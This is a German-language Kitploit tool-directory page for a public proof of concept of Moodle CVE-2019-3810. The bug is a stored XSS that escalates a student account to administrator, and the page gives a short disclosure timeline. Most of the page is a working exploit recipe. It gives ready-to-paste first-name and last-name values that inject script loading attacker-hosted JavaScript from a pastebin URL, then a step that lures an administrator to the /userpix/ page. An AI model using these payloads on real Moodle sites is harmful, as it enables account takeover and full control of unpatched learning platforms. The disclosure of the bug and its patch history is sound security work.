Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS-PoC für Privilege Escalation (Student zu Admin) | Kitploit
Tools/GitHubGitHub/farisv/moodle-cve-2019-3810
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS-PoC für Privilege Escalation (Student zu Admin)

Repository anzeigen
1721vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS-PoC zur Rechteausweitung (Student zu Admin). Dies ist einer der früheren Bugs, den ich während eines Pentests in einer akademischen Einrichtung entdeckt habe. Er war damals erfolgreich genug, um praktisch Admin-Zugriff zu stehlen und die vollständige Kontrolle über Moodle mit nur einem einzigen Bug zu erlangen.

Wir können aus der Git-Historie ersehen, dass der Bug seit alten Versionen von Moodle (2003) existierte und erst 2019 gepatcht wurde.

Zeitleiste:

  • Dezember 2018 - Den Bug an Moodle gemeldet
  • Januar 2019 - Patch veröffentlicht
  • April 2021 - PoC-Offenlegung

WARNUNG

NUR FÜR BILDUNGSZWECKE. VERWENDEN SIE DEN EXPLOIT NICHT FÜR ILLEGALE AKTIVITÄTEN. DER AUTOR IST NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN.

PoC

  1. Laden Sie die payload.js bei Pastebin oder einem ähnlichen Dienst hoch. Ändern Sie den Wert von userid in Ihre eigene ID. Nehmen wir an, die URL lautet https://pastebin.com/raw/xxxxxxxx.
  2. Melden Sie sich in Ihrem Studentenkonto an.
  3. Setzen Sie den Vornamen auf " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Setzen Sie den Nachnamen auf ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Bitten Sie den Administrator, die Seite /userpix/ zu öffnen, oder fügen Sie den Link zu dieser Seite in Ihren Beitrag ein und warten Sie.

Bei Erfolg wird Ihr Konto als Administrator hinzugefügt.

Demonstrationsvideo

Tool herunterladen